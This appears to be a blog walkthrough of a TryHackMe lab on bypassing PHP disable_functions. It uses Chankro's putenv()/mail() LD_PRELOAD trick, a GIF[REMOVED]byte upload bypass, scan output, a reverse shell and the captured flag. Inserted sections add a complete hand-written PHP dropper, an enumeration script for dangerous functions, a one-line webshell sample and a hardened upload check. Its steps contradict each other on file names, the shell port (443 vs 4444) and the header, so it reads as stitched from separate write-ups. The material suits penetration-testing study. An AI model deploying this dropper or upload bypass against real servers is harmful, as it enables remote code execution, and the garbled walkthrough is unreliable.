Bypass Disable Functions
Practice bypassing disabled dangerous features that run operating system commands or start processes.
This vulnerability appears in web applications that let a user upload a file without a security check that filters out dangerous content.
It allows an attacker to upload files containing code (scripts such as .php, .aspx and others) and run them on the same server; more information in this room.
Among the measures typically applied is disabling dangerous functions that could execute operating system commands or start processes. Functions such as system() or shell_exec() are often disabled through the disable_functions directive in the php.ini configuration file. Other, less well-known functions, such as dl() (which loads a PHP extension dynamically), can go unnoticed by the system administrator and remain enabled. During a penetration test it is standard practice to list which of these functions are still enabled, in case any have been overlooked.
One of the easiest techniques to implement, and not a very widespread one, is to abuse the mail() and putenv() functions. The technique is not new: it was reported to PHP in 2008 by gat3way, but it still works to this day. Through putenv() we can modify the environment variables of the PHP process, which lets us assign whatever value we want to the variable LD_PRELOAD. Roughly speaking, LD_PRELOAD makes the dynamic loader map a .so library of our choosing into a new process before the rest of its libraries, so that if the program calls a function from a library (libc.so, for example) and our library exports a function with the same name, ours is executed instead of the real one. In this way we can hijack or "hook" functions and modify their behaviour at will. The environment set with putenv() is inherited by every process PHP spawns, and mail() spawns one: it hands the message to the sendmail binary configured in sendmail_path through popen(), so a /bin/sh child is created whether or not sendmail is installed, and that child loads our library. A library with a constructor function does not even need to hook anything; the constructor runs as soon as the library is mapped.
Chankro: tool to evade disable_functions and open_basedir
With Chankro we generate a PHP script that acts as a dropper: it writes to the server a .so library and the binary (a meterpreter, for example) or bash script (a reverse shell, for example) that we want to run freely, and then calls putenv() and mail() to launch the process.
Install tool:
git clone https://github.com/TarlogicSecurity/Chankro.git
cd Chankro
python2 chankro.py --help
python chankro.py --arch 64 --input c.sh --output tryhackme.php --path /var/www/html
--arch = Architecture of the victim system, 32 or 64. The bundled .so must match the target; otherwise the loader refuses to preload it and the payload never runs.
--input = File with the payload to execute (a binary or a shell script).
--output = Name of the PHP file you are going to create; this is the file you will need to upload.
--path = Absolute path on the server of the directory where the uploaded PHP file will live and where it will write the .so and the payload. It must be writable by the web server user and allowed by open_basedir. For example, if our file lands in the uploads folder: DOCUMENTROOT + /uploads.
Now, when the PHP script is executed on the web server, the necessary files are created and our payload runs.
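To make explicit what the generated file does at each step, here is a hand-written dropper that performs the same sequence as Chankro's PHP output. This is an added example, not Chankro's code and not from the original post. It assumes (hypothetically) that HOOK_B64 holds the base64 of a compiled hook library for the target architecture whose constructor unsets LD_PRELOAD and executes the file named by the CHANKRO environment variable (the contract Chankro's bundled library follows; the library bytes are not reproduced here), and that the script sits in a writable directory inside open_basedir, i.e. the directory you would pass as --path.

```php
<?php
// Added example, not Chankro's generated code: a hand-written dropper performing the same
// steps. HOOK_B64 is a hypothetical placeholder for the base64 of a compiled hook library
// whose constructor unsets LD_PRELOAD and runs the file named by $CHANKRO.
const HOOK_B64 = '...base64 of hook.so for the target architecture...';

$dir = __DIR__;                 // writable and inside open_basedir, like chankro.py --path
$so  = "$dir/.hook.so";
$bin = "$dir/.payload.sh";
$out = "$dir/out.txt";
// Same role as c.sh in the post: the command to run, output written where we can read it.
$payload = "#!/bin/bash\nwhoami > '$out' 2>&1\n";

header('Content-Type: text/plain');

// Pre-flight: the route only exists if these survived disable_functions.
foreach (['putenv', 'mail', 'file_put_contents', 'chmod'] as $fn) {
    if (!function_exists($fn)) {
        exit("required function $fn is disabled or missing\n");
    }
}
if (!is_writable($dir)) {
    exit("$dir is not writable (or outside open_basedir)\n");
}
$hook = base64_decode(HOOK_B64, true);
if ($hook === false) {
    exit("HOOK_B64 is not valid base64; paste the real library\n");
}

// 1. Drop the library and the payload; the payload must be executable by the web user.
if (file_put_contents($so, $hook) === false || file_put_contents($bin, $payload) === false) {
    exit("write failed\n");
}
chmod($bin, 0755);

// 2. putenv() changes the environment of this PHP worker, so every process it spawns from
//    now on inherits both variables: LD_PRELOAD is read by the child's dynamic loader,
//    CHANKRO by our library's constructor.
putenv("CHANKRO=$bin");
putenv("LD_PRELOAD=$so");

// 3. mail() hands the message to sendmail_path through popen(), i.e. via /bin/sh. That sh
//    process inherits LD_PRELOAD, the loader maps .hook.so before libc, and the constructor
//    runs the payload as the web user. Whether the mail is deliverable is irrelevant.
@mail('nobody@example.invalid', 'x', 'x');

// 4. Unset LD_PRELOAD in this worker (otherwise every later child keeps firing), give the
//    payload a moment, show its output and remove the artefacts.
putenv('LD_PRELOAD');
usleep(500000);
echo is_file($out) ? file_get_contents($out)
                   : "no output: hook did not fire (wrong architecture? no /bin/sh?)\n";
@unlink($so);
@unlink($bin);
```

mail() returns as soon as pclose() has reaped the sh child, by which point the library has already been mapped and its constructor has run, so unlinking the .so afterwards is safe. The two failure modes worth checking first when nothing comes back are a library built for the wrong architecture (the loader logs that it cannot be preloaded and carries on) and a directory outside open_basedir.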
My command ran successfully, and it created a file in the directory with the output of the command.
First of all we will start the machine of the TryHackMe room Bypass Disable Functions and, after finding the room's IP, what do we see there!! There is an upload page where we can upload any image, and we can upload an executable file via Burp Suite, because we have to upload the PHP file by bypassing the check.
After uploading the malicious file we have to check which directory the file was uploaded to, so for this we will use gobuster to find the directory.
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/tryhackme-bypassdisablefunction/Chankro]
└─$ gobuster dir -u http://10.10.61.162/ -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -t 100 -x php
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.61.162/
[+] Method: GET
[+] Threads: 100
[+] Wordlist: /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Extensions: php
[+] Timeout: 10s
===============================================================
2021/09/16 12:23:04 Starting gobuster in directory enumeration mode
===============================================================
/uploads (Status: 301) [Size: 314] [--> http://10.10.61.162/uploads/]
/assets (Status: 301) [Size: 313] [--> http://10.10.61.162/assets/]
/cv.php (Status: 200) [Size: 4153]
Progress: 98580 / 441122 (22.35%)
If you want to check which ports are open on this host, you can do it with Nmap or RustScan.
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/tryhackme-bypassdisablefunction/Chankro]
└─$ rustscan -a 10.10.61.162 --ulimit 5000 -- -A -oN rustscan.txt
[~] Automatically increasing ulimit value to 5000.
Open 10.10.61.162:22
Open 10.10.61.162:80
[~] Starting Nmap
[>] The Nmap command to be run is nmap -A -oN rustscan.txt -vvv -p 22,80 10.10.61.162
Starting Nmap 7.91 ( https://nmap.org ) at 2021-09-16 12:17 IST
NSE: Loaded 153 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 12:17
Completed NSE at 12:17, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 12:17
Completed NSE at 12:17, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 12:17
Completed NSE at 12:17, 0.00s elapsed
Initiating Ping Scan at 12:17
Scanning 10.10.61.162 [2 ports]
Completed Ping Scan at 12:17, 0.24s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 12:17
Completed Parallel DNS resolution of 1 host. at 12:17, 0.07s elapsed
DNS resolution of 1 IPs took 0.07s. Mode: Async [#: 3, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating Connect Scan at 12:17
Scanning 10.10.61.162 [2 ports]
Discovered open port 22/tcp on 10.10.61.162
Discovered open port 80/tcp on 10.10.61.162
Completed Connect Scan at 12:17, 0.23s elapsed (2 total ports)
Initiating Service scan at 12:17
Scanning 2 services on 10.10.61.162
Completed Service scan at 12:17, 6.50s elapsed (2 services on 1 host)
NSE: Script scanning 10.10.61.162.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 12:17
Completed NSE at 12:17, 9.83s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 12:17
Completed NSE at 12:17, 1.21s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 12:17
Completed NSE at 12:17, 0.00s elapsed
Nmap scan report for 10.10.61.162
Host is up, received syn-ack (0.24s latency).
Scanned at 2021-09-16 12:17:30 IST for 18s
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 1f:97:54:30:24:74:f2:fa:15:ed:f3:35:84:dc:6c:d0 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCimETxFw3xwql560SXGeR88EX/FNiDVNYE4k7xBkwrl7+5YctrnqdNtGrZO2Ki3Zav9TlGBjtRcQ2GOadDlKpLXasXzkiv3nl58+d/VNlhFvaQP1zK5w0f+31KrZnH9EfL9oEv1UZ6UCmJM1O4uvcxYoUOfj0HQJ/27bMGwPETSnWyxVkaBpY34vukFqrlL9HoPTQATrcmxwFSnDh0yn7tSHdNMa8vIlD4lek0q9NG10tBThCTDyXgLnE3++fkutFMSQZ/6EA1tnRFcFK+YgMCRqxTrfr0nQr5JZykseVNO+gpcUY1NDVUlCdMV0xK+WTlukJoRIyfm68P/BZmkyBT
| 256 a7:21:78:6d:a6:05:7e:5a:0f:7e:53:65:0a:c4:53:49 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBBEb8bpOpxmuRcQAiMJGyKijMw+otZD9IxXMkjgL6k2HJCA1bvpPqk7rxHbDexKDvY3MgNPAx50Mp6tttsOaVXQ=
| 256 57:1c:22:ac:59:69:62:cb:94:bd:e9:9f:67:68:23:c9 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIHXfZcsCOQCeq6/HAIKcCimntv0KNHPvqXbsDiXH6WaD
80/tcp open http syn-ack Apache httpd 2.4.18 ((Ubuntu))
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Ecorp - Jobs
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 12:17
Completed NSE at 12:17, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 12:17
Completed NSE at 12:17, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 12:17
Completed NSE at 12:17, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 19.37 seconds
We got the file upload directory: /uploads.
Fingerprinting the site with Wappalyzer shows that the web application is written in PHP.
With this in mind, we can see that the file phpinfo.php is available; it gives us information about the server configuration and the settings the PHP interpreter runs with.
Looking at the information phpinfo gives us, we can see a section called disable_functions in which many critical functions are listed, such as:
exec
passthru
shell_exec
system
proc_open
popen
curl_exec
curl_multi_exec
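Listing the enabled functions, as the introduction recommends, is best done with a script rather than by reading phpinfo by eye, since phpinfo shows the php.ini list but not which functions are simply absent from the build. The following is an added example, not from the original post or from Chankro: uploaded (with the same bypass) as a .php file, or run locally against a php.ini you want to audit, it reports the state of each function that spawns processes or loads native code, and whether the putenv()+mail() route is viable from the directory it runs in. The candidate list is my own selection from common hardening guides, not the room's list.

```php
<?php
// Added example, not from the original post: enumerate which process-spawning or
// native-code-loading functions survived disable_functions on this PHP install.
header('Content-Type: text/plain');

// Own selection of candidates (assumption: typical hardening-guide list).
$candidates = [
    // run a command or spawn a process directly
    'system', 'exec', 'shell_exec', 'passthru', 'proc_open', 'popen', 'pcntl_exec',
    // load native code into PHP itself
    'dl',
    // the pair this post abuses: change the child environment, then spawn sendmail
    'putenv', 'mail', 'mb_send_mail',
    // error_log() with type 1 also goes through sendmail
    'error_log',
    // needed to drop the .so and the payload somewhere executable
    'file_put_contents', 'chmod',
    // other classic escapes worth knowing about
    'curl_exec', 'curl_multi_exec', 'imap_open',
];

// disable_functions is a comma-separated list; normalise it into a set.
$disabled = array_flip(array_filter(array_map('trim',
    explode(',', (string) ini_get('disable_functions')))));

printf("PHP %s (%s)\nopen_basedir    = %s\nsendmail_path   = %s\ndisable_classes = %s\n\n",
    PHP_VERSION, PHP_SAPI,
    ini_get('open_basedir') ?: '(unset)',
    ini_get('sendmail_path') ?: '(default)',
    ini_get('disable_classes') ?: '(none)');

$available = [];
foreach ($candidates as $fn) {
    // function_exists() is false both for disabled and for never-compiled functions,
    // so consult the php.ini list first to tell the two cases apart.
    if (isset($disabled[$fn])) {
        $state = 'disabled by php.ini';
    } elseif (!function_exists($fn)) {
        $state = 'not in this build';
    } else {
        $state = 'AVAILABLE';
        $available[] = $fn;
    }
    printf("%-18s %s\n", $fn, $state);
}

// FFI (PHP >= 7.4) is a class, not a function, so check it separately.
printf("%-18s %s\n", 'FFI', class_exists('FFI') ? 'AVAILABLE (see ffi.enable)' : 'absent');

// Viability of the putenv()+mail() LD_PRELOAD route from this directory: both functions
// must survive, we must be able to write the .so, and the directory must be inside
// open_basedir (is_writable() fails otherwise).
$route = in_array('putenv', $available, true) && in_array('mail', $available, true)
      && in_array('file_put_contents', $available, true) && is_writable(__DIR__);
printf("\nputenv+mail LD_PRELOAD route from %s: %s\n", __DIR__, $route ? 'VIABLE' : 'not viable');
```

Anything reported AVAILABLE in the first group is a direct command-execution primitive and makes the LD_PRELOAD trick unnecessary; the route at the bottom is the fallback for a list like the one above, where the obvious functions are gone but putenv and mail were overlooked.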
As we can see, we are very limited when it comes to uploading a PHP file whose code runs commands for us, but, thanks to the information this machine provides, we can make use of the tool Chankro.
This tool allows us to execute commands through the mail() and putenv() functions: it changes an environment variable so that the sendmail binary spawned by mail() loads our library. A low-level explanation of how it works is given in this article.
To test whether the tool works we are going to execute whoami and write its output into the web root, which is hosted at /var/www/html/fa5fba5f5a39d27d8bb7fe5f518e00db/; we know this because phpinfo shows the path where the web is hosted.
I will use Chankro with the following parameters, but first we create the c.sh file:
sudo nano c.sh
┌──(hackerboy㉿KumarAtulJaiswal)-[/opt/Chankro]
└─$ sudo python chankro.py --arch 64 --input c.sh --output hackingtruth-exploit.php --path /var/www/html/fa5fba5f5a39d27d8bb7fe5f518e00db/uploads
-=[ Chankro ]=-
-={ @TheXC3LL }=-
[+] Binary file: c.sh
[+] Architecture: x64
[+] Final PHP: hackingtruth-exploit.php
[+] File created!
Once Chankro has created the malicious PHP file, I go to the web page and upload it.
At upload time we intercept the request in Burp Suite, change the Content-Type to image/jpeg and prepend GIF87a to the file contents.
What is GIF87a?
GIF87a is the original format for indexed colour images. It uses LZW compression and has the option of being interlaced. GIF89a is the same, but also includes transparency and animation capabilities. Here only the six-byte signature matters: an upload filter that checks the declared Content-Type and the file's magic bytes accepts the file as an image, while the PHP interpreter simply echoes the bytes before the opening <?php tag and executes the code that follows.
Check whether the file was uploaded or not in the /uploads directory.
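To show why the Content-Type plus magic-byte check is bypassable and what a check that stops it looks like, here is an added example that is not from the original post. The helper names are hypothetical; both functions take the temporary upload path and the client-declared type, so call them after the usual $_FILES error and is_uploaded_file() checks. The hardened version assumes ext-fileinfo and ext-gd are installed.

```php
<?php
// Added example, not from the original post: the upload check the GIF87a trick defeats,
// next to one that rejects it. Helper names are hypothetical.

// Weak: trusts two attacker-controlled values, the multipart Content-Type and the first
// bytes of the file. getimagesize() is fooled the same way, since it only parses the header.
function weak_is_image(string $tmp, string $declared_type): bool
{
    $magic = (string) file_get_contents($tmp, false, null, 0, 6);
    return in_array($declared_type, ['image/jpeg', 'image/png', 'image/gif'], true)
        && (in_array(substr($magic, 0, 6), ['GIF87a', 'GIF89a'], true)
            || substr($magic, 0, 3) === "\xFF\xD8\xFF"      // JPEG
            || substr($magic, 0, 4) === "\x89PNG");         // PNG
}

// Hardened: decide the type from content, fully decode and re-encode the image, and let the
// server pick the name and extension. Returns the stored path or null on rejection.
function hardened_store(string $tmp, string $dest_dir): ?string
{
    // libmagic still reports image/gif for "GIF87a<?php ...", so this is only a first
    // filter; its real job is to pick the extension, never taken from the client's name.
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($tmp);
    $ext_for = ['image/jpeg' => 'jpg', 'image/png' => 'png', 'image/gif' => 'gif'];
    if (!isset($ext_for[$mime])) {
        return null;
    }
    // A bare magic header with PHP behind it is not a decodable image and fails here; a real
    // image with a payload appended decodes, but the re-encode below writes only pixel data.
    $img = @imagecreatefromstring((string) file_get_contents($tmp));
    if ($img === false) {
        return null;
    }
    // Random server-chosen name; $dest_dir should be outside the document root or served
    // with PHP execution disabled, so nothing stored there is ever interpreted.
    $ext  = $ext_for[$mime];
    $dest = rtrim($dest_dir, '/') . '/' . bin2hex(random_bytes(16)) . '.' . $ext;
    switch ($ext) {
        case 'jpg': $ok = imagejpeg($img, $dest, 90); break;
        case 'png': $ok = imagepng($img, $dest);      break;
        default:    $ok = imagegif($img, $dest);      break;
    }
    imagedestroy($img);
    return $ok ? $dest : null;
}

// Constructed sample: the walkthrough's upload, a GIF magic header with PHP code behind it.
$tmp = tempnam(sys_get_temp_dir(), 'upl');
file_put_contents($tmp, "GIF87a<?php system(\$_GET['c']); ?>");
var_dump(weak_is_image($tmp, 'image/jpeg'));
var_dump(hardened_store($tmp, sys_get_temp_dir()));
unlink($tmp);
```

Run from the command line, the weak check accepts the sample (declared type in the allow-list, signature matches) and the hardened one returns null because GD cannot decode it. Polyglot images that survive re-encoding are still possible in principle, which is why the random name and the non-executing storage directory are part of the fix rather than optional extras.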
Gaining Access
Now that we can see that commands can be executed at the system level, I will modify the file command.sh and add code so that, when it is executed, it starts a reverse shell to my machine on port 443:
With this in mind, and having already modified the file command.sh, I recreate the file winsad.php with Chankro and, once it is created, I add the header 'GIF89a;' and upload the file.
Once I have uploaded the PHP again and navigated to the path where winsad.php is hosted, I can see that the code is interpreted and gives me the shell:
Start a netcat listener and then open the uploaded file in the browser:
nc -nvlp 4444
Once inside the machine we can go to the home directory of the user s4vi and view the flag.
www-data@ubuntu:/var/www/html/fa5fba5f5a39d27d8bb7fe5f518e00db/uploads$ cd /home
www-data@ubuntu:/home$ ls -la
total 12
drwxr-xr-x  3 root root 4096 Jun 22 08:12 .
drwxr-xr-x 22 root root 4096 Jun 23 18:59 ..
drwxr-xr-x  4 s4vi s4vi 4096 Jun 23 23:34 s4vi
www-data@ubuntu:/home$ cd s4vi
www-data@ubuntu:/home/s4vi$ ls -la
total 44
drwxr-xr-x 4 s4vi s4vi 4096 Jun 23 23:34 .
drwxr-xr-x 3 root root 4096 Jun 22 08:12 ..
-rw------- 1 root root 6127 Jun 23 23:49 .bash_history
-rw-r--r-- 1 s4vi s4vi  220 Jun 22 08:12 .bash_logout
-rw-r--r-- 1 s4vi s4vi 3771 Jun 22 08:12 .bashrc
drwx------ 2 s4vi s4vi 4096 Jun 22 09:46 .cache
drwxrwxr-x 2 s4vi s4vi 4096 Jun 23 23:33 .nano
-rw-r--r-- 1 s4vi s4vi  655 Jun 22 08:12 .profile
-rw-r--r-- 1 s4vi s4vi    0 Jun 23 17:59 .sudo_as_admin_successful
-rw-r--r-- 1 root root  183 Jun 23 23:29 .wget-hsts
-rw-rw-r-- 1 s4vi s4vi   37 Jun 23 23:34 flag.txt
www-data@ubuntu:/home/s4vi$ cat flag.txt
thm{bypass_d1sable_functions_1n_php}
We got it!!!
Disclaimer
All tutorials are for informational and educational purposes only and have been made using our own routers, servers, websites and other vulnerable free resources; they do not contain any illegal activity. We believe that ethical hacking, information security and cyber security should be familiar subjects to anyone using digital information and computers. Hacking Truth is against misuse of the information and we strongly advise against it. Please regard the word hacking as ethical hacking or penetration testing every time this word is used. We do not promote, encourage, support or incite any illegal activity or hacking.
- Hacking Truth by Kumar Atul Jaiswal